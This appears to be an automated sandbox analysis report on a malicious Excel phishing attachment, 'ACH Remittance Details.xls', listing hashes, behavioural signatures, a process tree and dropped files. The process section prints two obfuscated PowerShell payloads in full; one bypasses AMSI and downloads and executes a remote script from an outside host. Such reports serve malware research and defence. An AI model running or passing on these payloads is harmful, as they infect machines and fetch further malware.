Analysis
-
max time kernel
21s -
max time network
130s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-01-2021 18:23
Static task
static1
Behavioral task
behavioral1
Sample
ACH Remittance Details.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ACH Remittance Details.xls
Resource
win10v20201028
General
-
Target
ACH Remittance Details.xls
-
Size
35KB
-
MD5
b3931a02644f28eaee7711d36333eece
-
SHA1
72e0ab0c9b992f94db5ae45022df57f1522b9895
-
SHA256
d36d950e9c94564bcb37f058d4ba3636281a273fd59d7eac0f3dc8fa215b5590
-
SHA512
5202adec9629fc94eaa70d2e6d62212a9ebde57e9d7e89709f33efd4fd54ab8f44c699fb9c4553b8b640273305ce73a0aece8a4935fef9c67c0d4c60ffd4da63
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2736 3884 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 16 2736 powershell.exe 25 2208 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3884 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 2736 powershell.exe 2736 powershell.exe 2736 powershell.exe 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeIncreaseQuotaPrivilege 2208 powershell.exe Token: SeSecurityPrivilege 2208 powershell.exe Token: SeTakeOwnershipPrivilege 2208 powershell.exe Token: SeLoadDriverPrivilege 2208 powershell.exe Token: SeSystemProfilePrivilege 2208 powershell.exe Token: SeSystemtimePrivilege 2208 powershell.exe Token: SeProfSingleProcessPrivilege 2208 powershell.exe Token: SeIncBasePriorityPrivilege 2208 powershell.exe Token: SeCreatePagefilePrivilege 2208 powershell.exe Token: SeBackupPrivilege 2208 powershell.exe Token: SeRestorePrivilege 2208 powershell.exe Token: SeShutdownPrivilege 2208 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeSystemEnvironmentPrivilege 2208 powershell.exe Token: SeRemoteShutdownPrivilege 2208 powershell.exe Token: SeUndockPrivilege 2208 powershell.exe Token: SeManageVolumePrivilege 2208 powershell.exe Token: 33 2208 powershell.exe Token: 34 2208 powershell.exe Token: 35 2208 powershell.exe Token: 36 2208 powershell.exe Token: SeIncreaseQuotaPrivilege 2208 powershell.exe Token: SeSecurityPrivilege 2208 powershell.exe Token: SeTakeOwnershipPrivilege 2208 powershell.exe Token: SeLoadDriverPrivilege 2208 powershell.exe Token: SeSystemProfilePrivilege 2208 powershell.exe Token: SeSystemtimePrivilege 2208 powershell.exe Token: SeProfSingleProcessPrivilege 2208 powershell.exe Token: SeIncBasePriorityPrivilege 2208 powershell.exe Token: SeCreatePagefilePrivilege 2208 powershell.exe Token: SeBackupPrivilege 2208 powershell.exe Token: SeRestorePrivilege 2208 powershell.exe Token: SeShutdownPrivilege 2208 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeSystemEnvironmentPrivilege 2208 powershell.exe Token: SeRemoteShutdownPrivilege 2208 powershell.exe Token: SeUndockPrivilege 2208 powershell.exe Token: SeManageVolumePrivilege 2208 powershell.exe Token: 33 2208 powershell.exe Token: 34 2208 powershell.exe Token: 35 2208 powershell.exe Token: 36 2208 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 3884 EXCEL.EXE 3884 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE 3884 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEpowershell.exeWScript.exedescription pid process target process PID 3884 wrote to memory of 2736 3884 EXCEL.EXE powershell.exe PID 3884 wrote to memory of 2736 3884 EXCEL.EXE powershell.exe PID 2736 wrote to memory of 2152 2736 powershell.exe WScript.exe PID 2736 wrote to memory of 2152 2736 powershell.exe WScript.exe PID 2152 wrote to memory of 2208 2152 WScript.exe powershell.exe PID 2152 wrote to memory of 2208 2152 WScript.exe powershell.exe PID 2152 wrote to memory of 3756 2152 WScript.exe cmd.exe PID 2152 wrote to memory of 3756 2152 WScript.exe cmd.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Details.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%72%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%C2%72%72%37%26%67%E2%47%E6%56%96%C6%34%02%46%56%47%36%56%47%F6%27%05%F2%23%76%E6%96%B6%F2%D6%F6%36%E2%37%27%56%76%16%E6%16%D6%97%47%27%56%07%F6%27%07%16%D6%16%26%16%C6%16%F2%F2%A3%07%47%47%86%72%72%82%56%72%B2%72%C6%96%72%B2%72%64%72%B2%72%46%72%B2%72%16%F6%72%B2%72%C6%E6%72%B2%72%77%F6%72%B2%72%44%E2%72%B2%72%92%47%E6%56%72%B2%72%96%C6%72%B2%72%34%72%B2%72%26%56%72%B2%72%75%72%B2%72%E2%47%72%B2%72%56%E4%72%02%B2%72%02%47%36%72%B2%72%56%A6%72%B2%72%26%F4%72%B2%72%D2%77%72%B2%72%56%E4%82%72';$text = $gh47gh7.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\notepad.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$lFeLwjZnnuqoqqmcWTtn='64%6F%20%7B%24%70%69%6E%67%20%3D%20%74%65%73%74%2D%63%6F%6E%6E%65%63%74%69%6F%6E%20%2D%63%6F%6D%70%20%67%6F%6F%67%6C%65%2E%63%6F%6D%20%2D%63%6F%75%6E%74%20%31%20%2D%51%75%69%65%74%7D%20%75%6E%74%69%6C%20%28%24%70%69%6E%67%29%3B%24%74%35%36%66%67%20%3D%20%5B%45%6E%75%6D%5D%3A%3A%54%6F%4F%62%6A%65%63%74%28%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%54%79%70%65%5D%2C%20%33%30%37%32%29%3B%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%72%76%69%63%65%50%6F%69%6E%74%4D%61%6E%61%67%65%72%5D%3A%3A%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%20%3D%20%24%74%35%36%66%67%3B%5B%52%65%66%5D%2E%41%73%73%65%6D%62%6C%79%2E%47%65%74%54%79%70%65%28%27%53%79%27%2B%27%73%74%65%6D%2E%27%2B%27%4D%61%6E%61%27%2B%27%67%65%6D%27%2B%27%65%6E%74%27%2B%27%2E%41%75%74%6F%6D%27%2B%27%61%74%69%6F%27%2B%27%6E%2E%41%27%2B%27%6D%27%2B%27%73%69%27%2B%27%55%74%69%6C%73%27%29%2E%47%65%74%46%69%65%6C%64%28%27%61%27%2B%27%6D%73%27%2B%27%69%49%27%2B%27%6E%69%74%46%61%27%2B%27%69%6C%65%64%27%2C%27%4E%6F%6E%40%40%40%27%2E%72%65%70%6C%61%63%65%28%27%40%40%40%27%2C%27%50%75%62%27%29%2B%27%6C%69%63%2C%53%27%2B%27%74%61%74%69%63%27%29%2E%53%65%74%56%61%6C%75%65%28%24%6E%75%6C%6C%2C%24%74%72%75%65%29%3B%24%74%74%79%3D%27%28%4E%65%77%2D%27%2B%27%4F%62%6A%65%27%2B%27%63%74%20%4E%65%27%2B%27%74%2E%57%65%27%2B%27%62%43%6C%69%27%2B%27%65%6E%74%29%27%7C%49%60%45%60%58%3B%5B%76%6F%69%64%5D%20%5B%53%79%73%74%65%6D%2E%52%65%66%6C%65%63%74%69%6F%6E%2E%41%73%73%65%6D%62%6C%79%5D%3A%3A%4C%6F%61%64%57%69%74%68%50%61%72%74%69%61%6C%4E%61%6D%65%28%27%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%27%29%3B%24%6D%76%3D%20%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%49%6E%74%65%72%61%63%74%69%6F%6E%5D%3A%3A%43%61%6C%6C%42%79%6E%61%6D%65%28%24%74%74%79%2C%27%44%6F%77%6E%6C%6F%61%64%53%74%72%69%6E%67%27%2C%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%43%61%6C%6C%54%79%70%65%5D%3A%3A%4D%65%74%68%6F%64%2C%27%68%74%74%70%73%3A%2F%2F%61%6C%61%62%61%6D%61%70%72%6F%70%65%72%74%79%6D%61%6E%61%67%65%72%73%2E%63%6F%6D%2F%6B%69%6E%67%2F%66%6F%6C%64%65%72%2F%41%74%74%61%63%6B%2E%6A%70%67%27%29%3B%24%72%37%38%66%64%30%30%30%73%64%3D%20%24%6D%76%20%2D%73%70%6C%69%74%20%27%25%27%20%7C%46%6F%72%45%61%63%68%2D%4F%62%6A%65%63%74%20%7B%5B%63%68%61%72%5D%5B%62%79%74%65%5D%22%30%78%24%5F%22%7D%3B%24%79%35%6A%68%36%32%64%66%30%3D%20%24%72%37%38%66%64%30%30%30%73%64%20%2D%6A%6F%69%6E%20%27%27%7C%49%60%45%60%58';$DFG45DFG0=$lFeLwjZnnuqoqqmcWTtn.Split('%') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\notepad.vbs" "C:\Users\Admin\AppData\Local" /Y4⤵PID:3756
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f6e7c3250025e07834a97fa50efdb12c
SHA126a6432727eaee088454bf8d3eb5f44a6dccfe8a
SHA256ff1e720e410ddf42092c2ca030b5e8f3d1ffb1435c126e0ddae5a330b1d4c20a
SHA51201bbd54911e6798b68265c1b121b71f4119c4ab92bdd65b44854295bd7ea0399ff35519231604f32e09048f47eaf075e528d555786745cf8c3670a81519df56b
-
C:\Users\Admin\AppData\Roaming\notepad.vbsMD5
7c2461575cefe582992751922a989015
SHA19fbe120ebe0a97597498ccb9b73754b9f02933e8
SHA256f3ea24d2f5b3b3e13a9d7c4a57e919c83227a48e52e02ea0765e429552a3f7be
SHA51243c3fc5a12ddf32ccef5cb7e0ccd9dedb913baa0f6247d1a6b7758750278f90a42fe2b81a87d75453f915cbb71bccf5a07599c57df54a72fde14b155b0dceb8c
-
memory/2152-14-0x0000000000000000-mapping.dmp
-
memory/2208-26-0x000001EE17F96000-0x000001EE17F98000-memory.dmpFilesize
8KB
-
memory/2208-25-0x000001EE19900000-0x000001EE19901000-memory.dmpFilesize
4KB
-
memory/2208-24-0x000001EE17F93000-0x000001EE17F95000-memory.dmpFilesize
8KB
-
memory/2208-23-0x000001EE17F90000-0x000001EE17F92000-memory.dmpFilesize
8KB
-
memory/2208-19-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmpFilesize
9.9MB
-
memory/2208-16-0x0000000000000000-mapping.dmp
-
memory/2736-12-0x0000021EBA143000-0x0000021EBA145000-memory.dmpFilesize
8KB
-
memory/2736-13-0x0000021EBA146000-0x0000021EBA148000-memory.dmpFilesize
8KB
-
memory/2736-11-0x0000021EBA140000-0x0000021EBA142000-memory.dmpFilesize
8KB
-
memory/2736-10-0x0000021EBA440000-0x0000021EBA441000-memory.dmpFilesize
4KB
-
memory/2736-9-0x0000021EBA290000-0x0000021EBA291000-memory.dmpFilesize
4KB
-
memory/2736-8-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmpFilesize
9.9MB
-
memory/2736-7-0x0000000000000000-mapping.dmp
-
memory/3756-17-0x0000000000000000-mapping.dmp
-
memory/3884-2-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-6-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-5-0x00007FFF6D2A0000-0x00007FFF6D8D7000-memory.dmpFilesize
6.2MB
-
memory/3884-4-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-3-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB